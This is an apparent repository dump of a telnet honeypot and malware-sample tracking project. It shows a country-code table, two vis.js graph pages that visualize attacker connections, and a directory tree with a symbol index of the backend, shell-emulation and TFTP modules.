Zealand","NI":"Nicaragua","NE":"Niger","NG":"Nigeria","NU":"Niue","NF":"Norfolk Island","MP":"Northern Mariana Islands","NO":"Norway","OM":"Oman","PK":"Pakistan","PW":"Palau","PS":"Palestinian Territory, Occupied","PA":"Panama","PG":"Papua New Guinea","PY":"Paraguay","PE":"Peru","PH":"Philippines","PN":"Pitcairn","PL":"Poland","PT":"Portugal","PR":"Puerto Rico","QA":"Qatar","RE":"Reunion","RO":"Romania","RU":"Russian Federation","RW":"RWANDA","SH":"Saint Helena","KN":"Saint Kitts and Nevis","LC":"Saint Lucia","PM":"Saint Pierre and Miquelon","VC":"Saint Vincent and the Grenadines","WS":"Samoa","SM":"San Marino","ST":"Sao Tome and Principe","SA":"Saudi Arabia","SN":"Senegal","CS":"Serbia and Montenegro","SC":"Seychelles","SL":"Sierra Leone","SG":"Singapore","SK":"Slovakia","SI":"Slovenia","SB":"Solomon Islands","SO":"Somalia","ZA":"South Africa","GS":"South Georgia and the South Sandwich Islands","ES":"Spain","LK":"Sri Lanka","SD":"Sudan","SR":"Suriname","SJ":"Svalbard and Jan Mayen","SZ":"Swaziland","SE":"Sweden","CH":"Switzerland","SY":"Syrian Arab Republic","TW":"Taiwan, Province of China","TJ":"Tajikistan","TZ":"Tanzania, United Republic of","TH":"Thailand","TL":"Timor-Leste","TG":"Togo","TK":"Tokelau","TO":"Tonga","TT":"Trinidad and Tobago","TN":"Tunisia","TR":"Turkey","TM":"Turkmenistan","TC":"Turks and Caicos Islands","TV":"Tuvalu","UG":"Uganda","UA":"Ukraine","AE":"United Arab Emirates","GB":"United Kingdom","US":"United States","UM":"United States Minor Outlying Islands","UY":"Uruguay","UZ":"Uzbekistan","VU":"Vanuatu","VE":"Venezuela","VN":"Viet Nam","VG":"Virgin Islands, British","VI":"Virgin Islands, U.S.","WF":"Wallis and Futuna","EH":"Western Sahara","YE":"Yemen","ZM":"Zambia","ZW":"Zimbabwe", "EU": "European Union"};
================================================
FILE: html/fancy/connhash/index.html
================================================
<!doctype html>
<html>
<head>
<title>Network | Hierarchical layout</title>
<style type="text/css">
body {
font: 10pt sans;
}
#mynetwork {
height: 800px;
border: 1px solid lightgray;
}
</style>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="http://visjs.org/dist/vis.js"></script>
<link rel="stylesheet" href="http://visjs.org/dist/vis-network.min.css">
<script type="text/javascript">
var nodes = [];
var edges = [];
var network = null;
var MAX = 2000;
var nodes_dict = {};
function load() {
$.get("http://localhost:5000/connhashtree/20", null, draw);
}
function processNode(node, level) {
c = (MAX - node.count) / MAX * 255;
nodes.push({
"level": level,
"id": node.connhash,
"label": node.count + "\n" + node.text.replace("/bin/busybox", "").substr(0, 32),
"color": "rgb(" + c + "," + c + "," + c + ")"
});
nodes_dict[node.connhash] = node;
for (var i = 0; i < node.childs.length; i++) {
child = node.childs[i];
edges.push({
"from": node.connhash,
"to": child.connhash,
"color": { 'color' : 'rgb(0,0,0)' }
});
processNode(child, level + 1);
}
}
function draw(data) {
data = JSON.parse(data);
console.log(data);
for (key in data) {
processNode(data[key], 0);
}
// create a network
var container = document.getElementById('mynetwork');
var options = {
layout: {
hierarchical: {
direction: "UD"
}
}
};
data = { "edges": edges, "nodes": nodes };
network = new vis.Network(container, data, options);
console.log(data);
// add event listeners
network.on("click", function (params) {
if (params.nodes.length == 1)
{
var node = nodes_dict[params.nodes[0]];
window.location.href = "http://localhost:5000/html/index.html#/connection/" + node.sample_id;
}
});
}
</script>
</head>
<body onload="load();">
<div id="mynetwork"></div>
</body>
</html>
================================================
FILE: html/fancy/graph/index.html
================================================
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="http://visjs.org/dist/vis.js"></script>
<link rel="stylesheet" href="http://visjs.org/dist/vis-network.min.css">
<style type="text/css">
.code {
font-family: monospace;
}
.code-line.isinput {
font-weight: bold;
}
</style>
<script src="../../apiurl.js"></script>
<script type="text/javascript">
var ips = {};
var conns = {};
var urls = {};
var samples = {};
var graph_data = null;
var globalnode = null;
function print(s)
{
console.log(s);
//$("#logbox").append(document.createTextNode( s + "\n" ));
}
function getIPConns(ip, olderthan)
{
var url = api + "/connections?ip=" + ip;
if (olderthan != null) url += "&older_than=" + olderthan + "&";
$.get(url, null, function (data) {
print("IPconns: " + ip + ", " + olderthan);
var myconns = JSON.parse(data);
for (var i = 0; i < myconns.length; i++)
{
getConn(myconns[i].id);
}
if (myconns.length > 0)
{
var date = myconns[myconns.length - 1].date;
getIPConns(ip, date);
}
});
}
function getIP(ip, type)
{
if (ip in ips)
{
return ips[ip];
} else {
print("New ip " + ip);
ips[ip] = {
"ip": ip,
"conns": {},
"neighbors": {},
"type": type
}
//getIPConns(ip, null);
return ips[ip];
}
}
function gotConn(conn)
{
print("Conn: " + conn.id);
// Check if the connection has ANY edge
// associates/urls/samples
//if (conn.urls.length == 0 && conn.conns_before.length == 0 && conn.conns_after.length == 0)
//{
// return;
//}
conns[conn.id] = conn;
ip = getIP(conn.ip, "ip");
for (var i = 0; i < conn.conns_before.l
gitextract_2jzluwq6/
├── .gitignore
├── Dockerfile
├── INSTALL.md
├── README.md
├── backend/
│ ├── __init__.py
│ ├── additionalinfo.py
│ ├── authcontroller.py
│ ├── backend.py
│ ├── clientcontroller.py
│ ├── cuckoo.py
│ ├── db.py
│ ├── ipdb/
│ │ ├── .gitignore
│ │ ├── __init__.py
│ │ └── ipdb.py
│ ├── virustotal.py
│ ├── virustotal_fill_db.py
│ └── webcontroller.py
├── backend.py
├── config.dist.yaml
├── create_config.sh
├── create_docker.sh
├── honeypot/
│ ├── __init__.py
│ ├── __main__.py
│ ├── client.py
│ ├── sampledb_client.py
│ ├── session.py
│ ├── shell/
│ │ ├── __init__.py
│ │ ├── commands/
│ │ │ ├── __init__.py
│ │ │ ├── base.py
│ │ │ ├── binary.py
│ │ │ ├── cmd_util.py
│ │ │ ├── shell.py
│ │ │ ├── shellcode.py
│ │ │ ├── tftp.py
│ │ │ └── wget.py
│ │ ├── grammar.peg
│ │ ├── grammar.py
│ │ ├── shell.py
│ │ ├── test.sh
│ │ └── test.txt
│ └── telnet.py
├── honeypot.py
├── html/
│ ├── .gitignore
│ ├── admin.html
│ ├── asn.html
│ ├── common.js
│ ├── connection.html
│ ├── connectionlist-embed.html
│ ├── connectionlist.html
│ ├── countries.js
│ ├── fancy/
│ │ ├── connhash/
│ │ │ └── index.html
│ │ └── graph/
│ │ └── index.html
│ ├── img/
│ │ ├── LICENSE
│ │ └── flags/
│ │ └── LICENSE
│ ├── index.html
│ ├── js/
│ │ └── angular-vis.js
│ ├── network.html
│ ├── networks.html
│ ├── overview.html
│ ├── sample.html
│ ├── sample.js
│ ├── samples.html
│ ├── tag.html
│ ├── tags.html
│ ├── url.html
│ └── urls.html
├── requirements.txt
├── tftpy/
│ ├── TftpClient.py
│ ├── TftpContexts.py
│ ├── TftpPacketFactory.py
│ ├── TftpPacketTypes.py
│ ├── TftpServer.py
│ ├── TftpShared.py
│ ├── TftpStates.py
│ └── __init__.py
├── util/
│ ├── __init__.py
│ ├── config.py
│ └── dbg.py
└── vagrant/
├── .gitignore
├── mariadb/
│ ├── Vagrantfile
│ └── mysql.sh
└── sqlite/
└── Vagrantfile
SYMBOL INDEX (493 symbols across 36 files)
FILE: backend/additionalinfo.py
function filter_ascii (line 9) | def filter_ascii(string):
function query_txt (line 13) | def query_txt(cname):
function query_a (line 25) | def query_a(cname):
function txt_to_ipinfo (line 37) | def txt_to_ipinfo(txt):
function txt_to_asinfo (line 48) | def txt_to_asinfo(txt):
function get_ip4_info (line 59) | def get_ip4_info(ip):
function get_ip6_info (line 70) | def get_ip6_info(ip):
function get_ip_info (line 84) | def get_ip_info(ip):
function get_asn_info (line 96) | def get_asn_info(asn):
function get_url_info (line 103) | def get_url_info(url):
FILE: backend/authcontroller.py
class AuthController (line 27) | class AuthController:
method __init__ (line 29) | def __init__(self):
method pwhash (line 34) | def pwhash(self, username, password):
method checkInitializeDB (line 38) | def checkInitializeDB(self):
method getUser (line 48) | def getUser(self, username):
method addUser (line 53) | def addUser(self, username, password, id=None):
method checkAdmin (line 61) | def checkAdmin(self, user):
method checkLogin (line 68) | def checkLogin(self, username, password):
FILE: backend/backend.py
function red (line 30) | def red(obj, attributes):
function add_cors (line 49) | def add_cors(response):
function verify_password (line 56) | def verify_password(username, password):
function send_index (line 66) | def send_index():
function serve_static (line 70) | def serve_static(filename):
function add_user (line 82) | def add_user(username):
function test_login (line 99) | def test_login():
function put_conn (line 104) | def put_conn():
function put_sample_info (line 118) | def put_sample_info(sha256):
function update_sample (line 125) | def update_sample(sha256):
function put_sample (line 130) | def put_sample():
function fail (line 141) | def fail(msg = "", code = 400):
function housekeeping (line 148) | def housekeeping():
function get_networks (line 153) | def get_networks():
function get_network (line 157) | def get_network(net_id):
function get_network_locations (line 161) | def get_network_locations(net_id):
function get_network_history (line 167) | def get_network_history(net_id):
function get_network_biggest_history (line 183) | def get_network_biggest_history():
function get_malwares (line 202) | def get_malwares():
function get_sample (line 208) | def get_sample(sha256):
function get_newest_samples (line 216) | def get_newest_samples():
function get_url (line 223) | def get_url(ref_enc):
function get_newest_urls (line 234) | def get_newest_urls():
function get_connection (line 241) | def get_connection(id):
function get_connections (line 249) | def get_connections():
function get_connections_fast (line 264) | def get_connections_fast():
function get_country_stats (line 272) | def get_country_stats():
function get_country_connections (line 277) | def get_country_connections(country):
function get_ip_connections (line 283) | def get_ip_connections(ip):
function get_newest_connections (line 289) | def get_newest_connections():
function get_connection_locations (line 294) | def get_connection_locations():
function get_tag (line 302) | def get_tag(name):
function get_tags (line 310) | def get_tags():
function connhash_tree (line 317) | def connhash_tree(layers):
function get_asn (line 323) | def get_asn(asn):
function run (line 330) | def run():
function stop (line 336) | def stop():
FILE: backend/clientcontroller.py
class ClientController (line 40) | class ClientController:
method __init__ (line 42) | def __init__(self):
method _get_asn (line 59) | def _get_asn(self, asn_id):
method calc_connhash_similiarity (line 73) | def calc_connhash_similiarity(self, h1, h2):
method calc_connhash (line 82) | def calc_connhash(self, stream):
method fill_db_ipranges (line 97) | def fill_db_ipranges(self):
method get_ip_range_offline (line 141) | def get_ip_range_offline(self, ip):
method get_ip_range_online (line 149) | def get_ip_range_online(self, ip):
method get_ip_range (line 172) | def get_ip_range(self, ip):
method get_url_info (line 178) | def get_url_info(self, url):
method do_housekeeping (line 194) | def do_housekeeping(self):
method put_session (line 220) | def put_session(self, session):
method create_network (line 379) | def create_network(self):
method create_url_sample (line 385) | def create_url_sample(self, f):
method put_sample (line 430) | def put_sample(self, data):
method update_vt_result (line 439) | def update_vt_result(self, sample_sha):
FILE: backend/cuckoo.py
class Cuckoo (line 18) | class Cuckoo():
method __init__ (line 20) | def __init__(self, config):
method upload (line 26) | def upload(self, path, name):
method cuckoo_check_if_dup (line 32) | def cuckoo_check_if_dup(self, sha256):
method postfile (line 52) | def postfile(self, artifact, fileName):
method posturl (line 72) | def posturl(self, scanUrl):
FILE: backend/db.py
function db_wrapper (line 22) | def db_wrapper(func, *args, **kwargs):
function now (line 39) | def now():
function filter_ascii (line 42) | def filter_ascii(string):
class IPRange (line 68) | class IPRange(Base):
class User (line 87) | class User(Base):
method json (line 96) | def json(self, depth=0):
class Network (line 101) | class Network(Base):
method json (line 115) | def json(self, depth=0):
class Malware (line 125) | class Malware(Base):
method json (line 132) | def json(self, depth=0):
class ASN (line 140) | class ASN(Base):
method json (line 152) | def json(self, depth=0):
class Sample (line 166) | class Sample(Base):
method json (line 183) | def json(self, depth=0):
class Connection (line 196) | class Connection(Base):
method json (line 235) | def json(self, depth=0):
class Url (line 285) | class Url(Base):
method json (line 306) | def json(self, depth=0):
class Tag (line 326) | class Tag(Base):
method json (line 335) | def json(self, depth=0):
function get_db (line 366) | def get_db():
function delete_everything (line 369) | def delete_everything():
class DB (line 381) | class DB:
method __init__ (line 383) | def __init__(self, sess):
method end (line 390) | def end(self):
method put_sample_data (line 398) | def put_sample_data(self, sha256, data):
method put_sample_result (line 406) | def put_sample_result(self, sha256, result):
method put_url (line 409) | def put_url(self, url, date, url_ip, url_asn, url_country):
method put_conn (line 416) | def put_conn(self, ip, user, password, date, text_combined, asn, block...
method put_sample (line 419) | def put_sample(self, sha256, name, length, date, info, result):
method link_conn_url (line 426) | def link_conn_url(self, id_conn, id_url):
method link_url_sample (line 429) | def link_url_sample(self, id_url, id_sample):
method link_conn_tag (line 432) | def link_conn_tag(self, id_conn, id_tag):
method get_conn_count (line 437) | def get_conn_count(self):
method get_sample_count (line 443) | def get_sample_count(self):
method get_url_count (line 449) | def get_url_count(self):
method search_sample (line 455) | def search_sample(self, q):
method search_url (line 459) | def search_url(self, q):
method get_url (line 470) | def get_url(self, url):
method get_url_conns (line 479) | def get_url_conns(self, id_url):
method get_url_conns_count (line 490) | def get_url_conns_count(self, id_url):
method get_sample_stats (line 498) | def get_sample_stats(self, date_from = 0):
method history_global (line 516) | def history_global(self, fromdate, todate, delta=3600):
method history_sample (line 526) | def history_sample(self, id_sample, fromdate, todate, delta=3600):
method get_samples (line 540) | def get_samples(self):
method get_sample (line 543) | def get_sample(self, sha256):
FILE: backend/ipdb/ipdb.py
function ipstr2int (line 7) | def ipstr2int(ip):
class Entry (line 13) | class Entry:
method __init__ (line 14) | def __init__(self, start, end, value):
class IPTable (line 19) | class IPTable:
method __init__ (line 20) | def __init__(self, fname):
method find_i (line 29) | def find_i(self, ip, start, end):
method __iter__ (line 43) | def __iter__(self):
method find_int (line 46) | def find_int(self, ip):
method find (line 49) | def find(self, ip):
function get_geo (line 52) | def get_geo():
function get_asn (line 55) | def get_asn():
function get_geo_iter (line 58) | def get_geo_iter():
class IPDB (line 63) | class IPDB:
method __init__ (line 64) | def __init__(self):
method find (line 68) | def find(self, ip):
FILE: backend/virustotal.py
class QuotaExceededError (line 9) | class QuotaExceededError(Exception):
method __str__ (line 10) | def __str__(self):
class Virustotal (line 13) | class Virustotal:
method __init__ (line 14) | def __init__(self, key):
method req (line 23) | def req(self, method, url, files=None, params=None, headers=None):
method upload_file (line 38) | def upload_file(self, f, fname):
method query_hash_sha256 (line 52) | def query_hash_sha256(self, h):
method put_comment (line 64) | def put_comment(self, obj, msg):
method get_best_result (line 76) | def get_best_result(self, r):
FILE: backend/virustotal_fill_db.py
function getName (line 13) | def getName(r):
FILE: backend/webcontroller.py
class WebController (line 27) | class WebController:
method __init__ (line 29) | def __init__(self):
method get_connection (line 33) | def get_connection(self, id):
method get_connections (line 42) | def get_connections(self, filter_obj={}, older_than=None):
method get_connections_fast (line 54) | def get_connections_fast(self):
method get_networks (line 71) | def get_networks(self):
method get_network (line 85) | def get_network(self, net_id):
method get_network_history (line 116) | def get_network_history(self, not_before, not_after, network_id):
method get_biggest_networks_history (line 143) | def get_biggest_networks_history(self, not_before, not_after):
method get_connection_locations (line 175) | def get_connection_locations(self, not_before, not_after, network_id =...
method get_malwares (line 190) | def get_malwares(self):
method get_sample (line 197) | def get_sample(self, sha256):
method get_newest_samples (line 202) | def get_newest_samples(self):
method get_url (line 209) | def get_url(self, url):
method get_newest_urls (line 214) | def get_newest_urls(self):
method get_tag (line 221) | def get_tag(self, name):
method get_tags (line 226) | def get_tags(self):
method get_country_stats (line 233) | def get_country_stats(self):
method get_asn (line 240) | def get_asn(self, asn):
method connhash_tree_lines (line 251) | def connhash_tree_lines(self, lines, mincount):
method connhash_tree (line 280) | def connhash_tree(self, layers):
FILE: honeypot.py
function import_file (line 17) | def import_file(fname):
function rerun_file (line 31) | def rerun_file(fname):
function signal_handler (line 47) | def signal_handler(signal, frame):
FILE: honeypot/__main__.py
function signal_handler (line 6) | def signal_handler(signal, frame):
FILE: honeypot/client.py
class Client (line 10) | class Client:
method __init__ (line 12) | def __init__(self):
method test_login (line 20) | def test_login(self):
method put_session (line 32) | def put_session(self, session, retry=True):
method put_sample (line 50) | def put_sample(self, data, retry=True):
FILE: honeypot/sampledb_client.py
function get_backend (line 14) | def get_backend():
function sha256 (line 25) | def sha256(data):
class SampleRecord (line 30) | class SampleRecord:
method __init__ (line 32) | def __init__(self, url, name, info, data):
method json (line 45) | def json(self):
class SessionRecord (line 56) | class SessionRecord:
method __init__ (line 58) | def __init__(self):
method log_raw (line 73) | def log_raw(self, obj):
method json (line 79) | def json(self):
method addInput (line 90) | def addInput(self, text):
method addOutput (line 97) | def addOutput(self, text):
method set_login (line 104) | def set_login(self, ip, user, password):
method add_file (line 110) | def add_file(self, data, url=None, name=None, info=None):
method commit (line 122) | def commit(self):
FILE: honeypot/session.py
class Session (line 22) | class Session:
method __init__ (line 23) | def __init__(self, output, remote_addr):
method login (line 36) | def login(self, user, password):
method download (line 42) | def download(self, data):
method found_file (line 56) | def found_file(self, path, data):
method end (line 67) | def end(self):
method send_string (line 78) | def send_string(self, text):
method shell (line 82) | def shell(self, l):
FILE: honeypot/shell/commands/base.py
class Proc (line 6) | class Proc:
method register (line 10) | def register(name, obj):
method get (line 14) | def get(name):
class StaticProc (line 20) | class StaticProc(Proc):
method __init__ (line 21) | def __init__(self, output, result=0):
method run (line 25) | def run(self, env, args):
class FuncProc (line 29) | class FuncProc(Proc):
method __init__ (line 30) | def __init__(self, func):
method run (line 33) | def run(self, env, args):
class Exec (line 39) | class Exec(Proc):
method run (line 41) | def run(self, env, args):
class BusyBox (line 76) | class BusyBox(Proc):
method run (line 78) | def run(self, env, args):
class Cat (line 100) | class Cat(Proc):
method run (line 102) | def run(self, env, args):
class Echo (line 112) | class Echo(Proc):
method run (line 114) | def run(self, env, args):
class Rm (line 131) | class Rm(Proc):
method run (line 133) | def run(self, env, args):
class Ls (line 141) | class Ls(Proc):
method run (line 143) | def run(self, env, args):
class Dd (line 148) | class Dd(Proc):
method run (line 150) | def run(self, env, args):
class Cp (line 180) | class Cp(Proc):
method run (line 182) | def run(self, env, args):
FILE: honeypot/shell/commands/binary.py
function dbg (line 6) | def dbg(s):
function run_binary (line 9) | def run_binary(data, fname, args, env):
FILE: honeypot/shell/commands/cmd_util.py
function easy_getopt (line 3) | def easy_getopt(args, opt, longopts=[]):
FILE: honeypot/shell/commands/shell.py
class Shell (line 3) | class Shell(Proc):
method run (line 5) | def run(self, env, args):
FILE: honeypot/shell/commands/shellcode.py
class Shellcode (line 4) | class Shellcode():
method run (line 6) | def run(self, data):
FILE: honeypot/shell/commands/tftp.py
class DummyIO (line 14) | class DummyIO(io.RawIOBase):
method __init__ (line 16) | def __init__(self):
method write (line 19) | def write(self, s):
class StaticTftp (line 22) | class StaticTftp(Proc):
method run (line 24) | def run(self, env, args):
class Tftp (line 27) | class Tftp:
method run (line 43) | def run(self, env, args):
method download (line 110) | def download(self, host, port, fname):
method pkt (line 121) | def pkt(self, data):
FILE: honeypot/shell/commands/wget.py
class Wget (line 11) | class Wget(Proc):
method dl (line 13) | def dl(self, env, url, path=None, echo=True):
method run (line 97) | def run(self, env, args):
FILE: honeypot/shell/grammar.py
class TreeNode (line 5) | class TreeNode(object):
method __init__ (line 6) | def __init__(self, text, offset, elements=None):
method __iter__ (line 11) | def __iter__(self):
class TreeNode1 (line 16) | class TreeNode1(TreeNode):
method __init__ (line 17) | def __init__(self, text, offset, elements):
class TreeNode2 (line 22) | class TreeNode2(TreeNode):
method __init__ (line 23) | def __init__(self, text, offset, elements):
class TreeNode3 (line 29) | class TreeNode3(TreeNode):
method __init__ (line 30) | def __init__(self, text, offset, elements):
class TreeNode4 (line 35) | class TreeNode4(TreeNode):
method __init__ (line 36) | def __init__(self, text, offset, elements):
class TreeNode5 (line 42) | class TreeNode5(TreeNode):
method __init__ (line 43) | def __init__(self, text, offset, elements):
class TreeNode6 (line 48) | class TreeNode6(TreeNode):
method __init__ (line 49) | def __init__(self, text, offset, elements):
class TreeNode7 (line 55) | class TreeNode7(TreeNode):
method __init__ (line 56) | def __init__(self, text, offset, elements):
class TreeNode8 (line 61) | class TreeNode8(TreeNode):
method __init__ (line 62) | def __init__(self, text, offset, elements):
class TreeNode9 (line 68) | class TreeNode9(TreeNode):
method __init__ (line 69) | def __init__(self, text, offset, elements):
class TreeNode10 (line 75) | class TreeNode10(TreeNode):
method __init__ (line 76) | def __init__(self, text, offset, elements):
class TreeNode11 (line 81) | class TreeNode11(TreeNode):
method __init__ (line 82) | def __init__(self, text, offset, elements):
class ParseError (line 87) | class ParseError(SyntaxError):
class Grammar (line 94) | class Grammar(object):
method _read_cmd (line 99) | def _read_cmd(self):
method _read_cmdlist (line 115) | def _read_cmdlist(self):
method _read_cmdsingle (line 211) | def _read_cmdsingle(self):
method _read_cmdpipe (line 307) | def _read_cmdpipe(self):
method _read_cmdredir (line 423) | def _read_cmdredir(self):
method _read_cmdargs (line 615) | def _read_cmdargs(self):
method _read_cmdbrac (line 631) | def _read_cmdbrac(self):
method _read_args (line 705) | def _read_args(self):
method _read_arg (line 785) | def _read_arg(self):
method _read_arg_noempty (line 807) | def _read_arg_noempty(self):
method _read_arg_quot1 (line 826) | def _read_arg_quot1(self):
method _read_arg_quot2 (line 908) | def _read_arg_quot2(self):
method _read_arg_noquot (line 990) | def _read_arg_noquot(self):
method _read_empty (line 1022) | def _read_empty(self):
method _read_sep (line 1048) | def _read_sep(self):
class Parser (line 1081) | class Parser(Grammar):
method __init__ (line 1082) | def __init__(self, input, actions, types):
method parse (line 1092) | def parse(self):
function format_error (line 1102) | def format_error(input, offset, expected):
function parse (line 1113) | def parse(input, actions=None, types=None):
FILE: honeypot/shell/shell.py
function filter_ascii (line 7) | def filter_ascii(string):
function instantwrite (line 44) | def instantwrite(msg):
class Env (line 48) | class Env:
method __init__ (line 49) | def __init__(self, output=instantwrite):
method write (line 55) | def write(self, string):
method deleteFile (line 58) | def deleteFile(self, path):
method writeFile (line 63) | def writeFile(self, path, string):
method readFile (line 69) | def readFile(self, path):
method listen (line 77) | def listen(self, event, handler):
method action (line 80) | def action(self, event, data):
method listfiles (line 86) | def listfiles(self):
class RedirEnv (line 89) | class RedirEnv:
method __init__ (line 90) | def __init__(self, baseenv, redir):
method write (line 94) | def write(self, string):
method deleteFile (line 97) | def deleteFile(self, path):
method writeFile (line 100) | def writeFile(self, path, string):
method readFile (line 103) | def readFile(self, path):
method listen (line 106) | def listen(self, event, handler):
method action (line 109) | def action(self, event, data):
method listfiles (line 112) | def listfiles(self):
class Command (line 115) | class Command:
method __init__ (line 116) | def __init__(self, args):
method redirect_to (line 123) | def redirect_to(self, filename):
method redirect_from (line 127) | def redirect_from(self, filename):
method redirect_app (line 130) | def redirect_app(self, filename):
method run (line 134) | def run(self, env):
method isnone (line 145) | def isnone(self):
method __str__ (line 148) | def __str__(self):
class CommandList (line 151) | class CommandList:
method __init__ (line 153) | def __init__(self, mode, cmd1, cmd2):
method redirect_to (line 158) | def redirect_to(self, filename):
method redirect_from (line 162) | def redirect_from(self, filename):
method redirect_app (line 166) | def redirect_app(self, filename):
method run (line 170) | def run(self, env):
method isnone (line 190) | def isnone(self):
method __str__ (line 193) | def __str__(self):
class Actions (line 196) | class Actions(object):
method make_arg_noquot (line 197) | def make_arg_noquot(self, input, start, end, elements):
method make_arg_quot (line 200) | def make_arg_quot(self, input, start, end, elements):
method make_list (line 203) | def make_list(self, input, start, end, elements):
method make_single (line 213) | def make_single(self, input, start, end, elements):
method make_pipe (line 224) | def make_pipe(self, input, start, end, elements):
method make_redir (line 238) | def make_redir(self, input, start, end, elements):
method make_cmdbrac (line 257) | def make_cmdbrac(self, input, start, end, elements):
method make_args (line 260) | def make_args(self, input, start, end, elements):
function run (line 274) | def run(string, env):
function test_shell (line 278) | def test_shell():
FILE: honeypot/telnet.py
class IPFilter (line 12) | class IPFilter:
method __init__ (line 14) | def __init__(self):
method add_ip (line 18) | def add_ip(self, ip):
method is_allowed (line 21) | def is_allowed(self, ip):
method clean (line 25) | def clean(self):
class Telnetd (line 36) | class Telnetd:
method __init__ (line 75) | def __init__(self, addr, port):
method run (line 82) | def run(self):
method handle (line 95) | def handle(self):
method stop (line 111) | def stop(self):
class TelnetSess (line 114) | class TelnetSess:
method __init__ (line 115) | def __init__(self, serv, sock, remote):
method loop (line 124) | def loop(self):
method test_naws (line 166) | def test_naws(self):
method test_linemode (line 186) | def test_linemode(self):
method test_opt (line 192) | def test_opt(self, opt, do=True):
method send (line 202) | def send(self, byte):
method send_string (line 209) | def send_string(self, msg):
method recv (line 213) | def recv(self):
method recv_line (line 224) | def recv_line(self):
method recv_short (line 240) | def recv_short(self):
method need (line 246) | def need(self, byte_need):
method process_cmd (line 257) | def process_cmd(self, cmd):
FILE: html/common.js
function extractHash (line 4) | function extractHash() {
function formatDate (line 17) | function formatDate(date) {
function formatDay (line 24) | function formatDay(date) {
function formatDateTime (line 29) | function formatDateTime(date) {
function time (line 35) | function time() {
function nicenull (line 39) | function nicenull (str, el) {
function short (line 46) | function short (str, l) {
function encurl (line 53) | function encurl(url) {
function decurl (line 57) | function decurl(url) {
FILE: html/sample.js
function roundDate (line 188) | function roundDate(date) {
function network_graph_data (line 192) | function network_graph_data(networks)
FILE: tftpy/TftpClient.py
class TftpClient (line 10) | class TftpClient(TftpSession):
method __init__ (line 15) | def __init__(self, host, port, options={}):
method download (line 28) | def download(self, filename, output, packethook=None, timeout=SOCK_TIM...
method upload (line 68) | def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT):
FILE: tftpy/TftpContexts.py
class TftpMetrics (line 21) | class TftpMetrics(object):
method __init__ (line 23) | def __init__(self):
method compute (line 41) | def compute(self):
method add_dup (line 53) | def add_dup(self, pkt):
class TftpContext (line 67) | class TftpContext(object):
method __init__ (line 70) | def __init__(self, host, port, timeout, dyn_file_func=None):
method getBlocksize (line 101) | def getBlocksize(self):
method __del__ (line 105) | def __del__(self):
method checkTimeout (line 111) | def checkTimeout(self, now):
method start (line 118) | def start(self):
method end (line 121) | def end(self):
method gethost (line 130) | def gethost(self):
method sethost (line 134) | def sethost(self, host):
method setNextBlock (line 142) | def setNextBlock(self, block):
method getNextBlock (line 148) | def getNextBlock(self):
method cycle (line 153) | def cycle(self):
class TftpContextServer (line 195) | class TftpContextServer(TftpContext):
method __init__ (line 197) | def __init__(self, host, port, timeout, root, dyn_file_func=None):
method __str__ (line 210) | def __str__(self):
method start (line 213) | def start(self, buffer):
method end (line 233) | def end(self):
class TftpContextClientUpload (line 240) | class TftpContextClientUpload(TftpContext):
method __init__ (line 243) | def __init__(self,
method __str__ (line 267) | def __str__(self):
method start (line 270) | def start(self):
method end (line 305) | def end(self):
class TftpContextClientDownload (line 312) | class TftpContextClientDownload(TftpContext):
method __init__ (line 315) | def __init__(self,
method __str__ (line 345) | def __str__(self):
method start (line 348) | def start(self):
method end (line 382) | def end(self):
FILE: tftpy/TftpPacketFactory.py
class TftpPacketFactory (line 8) | class TftpPacketFactory(object):
method __init__ (line 12) | def __init__(self):
method parse (line 22) | def parse(self, buffer):
method __create (line 33) | def __create(self, opcode):
FILE: tftpy/TftpPacketTypes.py
class TftpSession (line 7) | class TftpSession(object):
class TftpPacketWithOptions (line 13) | class TftpPacketWithOptions(object):
method __init__ (line 18) | def __init__(self):
method setoptions (line 21) | def setoptions(self, options):
method getoptions (line 34) | def getoptions(self):
method decode_options (line 43) | def decode_options(self, buffer):
class TftpPacket (line 82) | class TftpPacket(object):
method __init__ (line 86) | def __init__(self):
method encode (line 90) | def encode(self):
method decode (line 98) | def decode(self):
class TftpPacketInitial (line 108) | class TftpPacketInitial(TftpPacket, TftpPacketWithOptions):
method __init__ (line 111) | def __init__(self):
method encode (line 117) | def encode(self):
method decode (line 161) | def decode(self):
class TftpPacketRRQ (line 201) | class TftpPacketRRQ(TftpPacketInitial):
method __init__ (line 210) | def __init__(self):
method __str__ (line 214) | def __str__(self):
class TftpPacketWRQ (line 221) | class TftpPacketWRQ(TftpPacketInitial):
method __init__ (line 230) | def __init__(self):
method __str__ (line 234) | def __str__(self):
class TftpPacketDAT (line 241) | class TftpPacketDAT(TftpPacket):
method __init__ (line 250) | def __init__(self):
method __str__ (line 256) | def __str__(self):
method encode (line 262) | def encode(self):
method decode (line 274) | def decode(self):
class TftpPacketACK (line 289) | class TftpPacketACK(TftpPacket):
method __init__ (line 298) | def __init__(self):
method __str__ (line 303) | def __str__(self):
method encode (line 306) | def encode(self):
method decode (line 312) | def decode(self):
class TftpPacketERR (line 318) | class TftpPacketERR(TftpPacket):
method __init__ (line 341) | def __init__(self):
method __str__ (line 359) | def __str__(self):
method encode (line 364) | def encode(self):
method decode (line 375) | def decode(self):
class TftpPacketOACK (line 396) | class TftpPacketOACK(TftpPacket, TftpPacketWithOptions):
method __init__ (line 404) | def __init__(self):
method __str__ (line 409) | def __str__(self):
method encode (line 412) | def encode(self):
method decode (line 426) | def decode(self):
method match_options (line 430) | def match_options(self, options):
FILE: tftpy/TftpServer.py
class TftpServer (line 13) | class TftpServer(TftpSession):
method __init__ (line 21) | def __init__(self, tftproot='/tftpboot', dyn_file_func=None):
method listen (line 49) | def listen(self,
FILE: tftpy/TftpShared.py
function tftpassert (line 23) | def tftpassert(condition, msg):
function setLogLevel (line 31) | def setLogLevel(level):
class TftpErrors (line 38) | class TftpErrors(object):
class TftpException (line 51) | class TftpException(Exception):
class TftpTimeout (line 56) | class TftpTimeout(TftpException):
FILE: tftpy/TftpStates.py
class TftpState (line 19) | class TftpState(object):
method __init__ (line 22) | def __init__(self, context):
method handle (line 28) | def handle(self, pkt, raddress, rport):
method handleOACK (line 33) | def handleOACK(self, pkt):
method returnSupportedOptions (line 49) | def returnSupportedOptions(self, options):
method serverInitial (line 76) | def serverInitial(self, pkt, raddress, rport):
